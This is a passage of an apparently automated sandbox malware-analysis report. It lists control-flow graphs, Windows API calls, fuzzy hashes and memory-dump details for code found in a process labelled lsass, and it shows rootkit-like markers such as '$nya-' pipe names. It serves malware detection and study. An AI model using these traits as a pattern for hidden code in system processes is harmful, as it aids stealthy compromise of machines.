140ae86a35e-140ae86a368 call 140ae86b2cc 510->533 515 140ae86a4f0-140ae86a4f4 511->515 516 140ae86a55f 511->516 529 140ae86a4f9-140ae86a556 call 140ae86a158 512->529 530 140ae86a4d9-140ae86a4dc 512->530 515->480 521 140ae86a564 516->521 521->473 529->521 530->507 532->435 537 140ae86a6d2-140ae86a6d7 call 140ae86c2f4 533->537 538 140ae86a36e-140ae86a6d1 call 140ae868f84 call 140ae86ad28 call 140ae869178 533->538 537->478 538->537
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                                      • Instruction ID: 65fdb15c267c9e13b84f25c510c081320872cd80976ed899fd202103a309cf4a
                                                                      • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                                      • Instruction Fuzzy Hash: 1CD19B32644B808AEB22DF66D4453DD77A0F7497A8F201155EF8D57BBADB38C880D782
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000003.2361554206.00000140ADFC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_3_140adfc0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                      • Instruction ID: f5437a1e7da2a725e9ab22ad33e8f30e08157a3268999d223fd606fd9b310203
                                                                      • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                      • Instruction Fuzzy Hash: E9D17F7262078887EB62DF66D4803DE37B2FB49789F205115EF8957BA6DB34C1A2D700

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 548 140ae86104c-140ae8610b9 RegQueryInfoKeyW 549 140ae8611b5-140ae8611d0 548->549 550 140ae8610bf-140ae8610c9 548->550 550->549 551 140ae8610cf-140ae86111f RegEnumValueW 550->551 552 140ae8611a5-140ae8611af 551->552 553 140ae861125-140ae86112a 551->553 552->549 552->551 553->552 554 140ae86112c-140ae861135 553->554 555 140ae861147-140ae86114c 554->555 556 140ae861137 554->556 557 140ae86114e-140ae861193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 555->557 558 140ae861199-140ae8611a3 555->558 559 140ae86113b-140ae86113f 556->559 557->558 558->552 559->552 560 140ae861141-140ae861145 559->560 560->555 560->559
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                      • String ID: d
                                                                      • API String ID: 3743429067-2564639436
                                                                      • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                                      • Instruction ID: b3e6ac650a1da149a06b88ef6f31a51e5fea5f7ee42c972b554680c0ac2eddc6
                                                                      • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                                      • Instruction Fuzzy Hash: 9B415E32214B84DAE761CF22E44439A77B1F388BA8F648115DF8D07B68DF38C845CB41
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                                      • String ID: \\.\pipe\$nya-childproc
                                                                      • API String ID: 166002920-3933612297
                                                                      • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                                      • Instruction ID: 7cc910c9b8b5c23ff5329ae8c1745924814e302ec66320a935cbe0706c4e695e
                                                                      • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                                      • Instruction Fuzzy Hash: 91114932654B4082E7119F26F45879AB7A1F789BE5FA40315EF9D03AA8DF3CC548CB81
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 190073905-0
                                                                      • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                      • Instruction ID: fdba535223e4d6e691733c195be15de6f35b588baec698ad2747609982f32f06
                                                                      • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                      • Instruction Fuzzy Hash: 8881C0306807418BFB53AB6794513E96292AB8DBB4F744025AF0D473BADB3ACC45C3C2
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000003.2361554206.00000140ADFC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_3_140adfc0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 190073905-0
                                                                      • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                      • Instruction ID: 85711186c97cbff0377e5c2e715167015312233b22c8c2c25ea7c2fcbbf1993f
                                                                      • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                      • Instruction Fuzzy Hash: 02819F3162038947FA579B2798413DB72B3AF8E784F7881159F49477B6DB38C867A700
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00000140AE869C6B,?,?,?,00000140AE86945C,?,?,?,?,00000140AE868F65), ref: 00000140AE869B31
                                                                      • GetLastError.KERNEL32(?,?,?,00000140AE869C6B,?,?,?,00000140AE86945C,?,?,?,?,00000140AE868F65), ref: 00000140AE869B3F
                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00000140AE869C6B,?,?,?,00000140AE86945C,?,?,?,?,00000140AE868F65), ref: 00000140AE869B69
                                                                      • FreeLibrary.KERNEL32(?,?,?,00000140AE869C6B,?,?,?,00000140AE86945C,?,?,?,?,00000140AE868F65), ref: 00000140AE869BD7
                                                                      • GetProcAddress.KERNEL32(?,?,?,00000140AE869C6B,?,?,?,00000140AE86945C,?,?,?,?,00000140AE868F65), ref: 00000140AE869BE3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: api-ms-
                                                                      • API String ID: 2559590344-2084034818
                                                                      • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                                      • Instruction ID: 9b9d92c5250aad3cb055442c4d292a2c940a33d7f5c17eb1e135a46569d01d98
                                                                      • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                                      • Instruction Fuzzy Hash: 8B315A31292B5091EE239B17A8007E92394FB4DBB0F790625AE1D4B7A4EE3CC844C392
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                      • String ID: CONOUT$
                                                                      • API String ID: 3230265001-3130406586
                                                                      • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                                      • Instruction ID: 98f31336ca50ed8072dedac400a18e145e28bb25d61f32fad1ddb8045cb7b402
                                                                      • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                                      • Instruction Fuzzy Hash: BC117931290B4086E7529B53A86479976A0B79CBF4F640224EF5E87BA4CB38C804C786
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$Current$Context
                                                                      • String ID:
                                                                      • API String ID: 1666949209-0
                                                                      • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                                      • Instruction ID: d470fa2b332134bf608e2e37984f554f1154689177c6186929d7326d993ad346
                                                                      • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                                      • Instruction Fuzzy Hash: 0AD19C76244B8882EA719B0AE49439A77A0F38CB98F600116EFCD477B5DF3DC951DB81
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Free$CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 564911740-0
                                                                      • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                                      • Instruction ID: a81d9dcb6b7abe47899e749abfef0a334bbdceb0d443c9777401c9a22bc2a4ee
                                                                      • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                                      • Instruction Fuzzy Hash: 8151A571281B4595EF07EB2AE8502D463A2BB0C7A8FA40915AF2D077B5EF78DD54C3C2
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID: $nya-
                                                                      • API String ID: 756756679-1266920357
                                                                      • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                                      • Instruction ID: f9418c794d8d54a96e405f35dd2266103e973814a1a1025377e54d55553bbc2e
                                                                      • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                                      • Instruction Fuzzy Hash: F9318E32741B9192EB12DF17E9407A963A1FB98BA4F2880208F4C47B75EF34DC61C781
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$Value$FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 365477584-0
                                                                      • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                                      • Instruction ID: 905f3d60cdc7003f3bbbbb79e9b8bc607d62d69e82a5cda8593bf9adb4fb4abe
                                                                      • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                                      • Instruction Fuzzy Hash: C511303128434046FB1A7B3364113EA2152AB8C7B0FB44624AF6E577EACE38DC01C782
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                      • String ID:
                                                                      • API String ID: 517849248-0
                                                                      • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                                      • Instruction ID: ef1a1a32d087f8f7b9728cdc05088cef9e654416d3adb2fed78c76f7d4e656ca
                                                                      • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                                      • Instruction Fuzzy Hash: FE011731744B8086EB15EB13A85839963A1FB8CFE1FA840359F9D43764DE38C985C781
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                      • String ID:
                                                                      • API String ID: 449555515-0
                                                                      • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                                      • Instruction ID: 6c8a3988af53568c6b7d5d3e945e588ec54f25c6d59e7b738af72daf99e024a2
                                                                      • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                                      • Instruction Fuzzy Hash: 42010975651B4082FB26AB23E84879573A1AF9DBA5F640028CF4D07774EF3DC848C782
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                                      • Instruction ID: 3e62b6f4eded78c39dbe87eabcaa7ef6fe218e6a936e55e5fdf1698110d071ff
                                                                      • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                                      • Instruction Fuzzy Hash: 50F06D71290B0181EB169B26A8953E96320AB8D7B4FB402299F6E471F4DF38CC48C282
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CombinePath
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3422762182-91387939
                                                                      • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                                      • Instruction ID: 9a81df958154396c5aaf96113f36e1fad7df758da98bd7beb4fa9050bdf33f7b
                                                                      • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                                      • Instruction Fuzzy Hash: 39F05E74344B8082EB069B13B9141996661AB4DFE0F748030EF1E0BB38CE38C845C781
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                                      • Instruction ID: bbc127f35c5560cdeb793558dc9aefb105b444ebade9037f95e966a343d1f239
                                                                      • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                                      • Instruction Fuzzy Hash: 1802DC32159B8486E761DB56F49039AB7A0F7C87A4F200415EF8E87BA8DF7CC854CB41
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                                      • Instruction ID: d89edb8fd97b678989d4e0d555f6ed6a7bbd63ec31b92eef1536de30159fe236
                                                                      • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                                      • Instruction Fuzzy Hash: 02519E356447518BE366DB1BA440A9AB3A1F78CBA4F7041299F4E43B74DF38CD45CB82
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                                      • Instruction ID: 88ad7280715c3692988ced099907e6a5f31f10e172645ce38b59168940cbd441
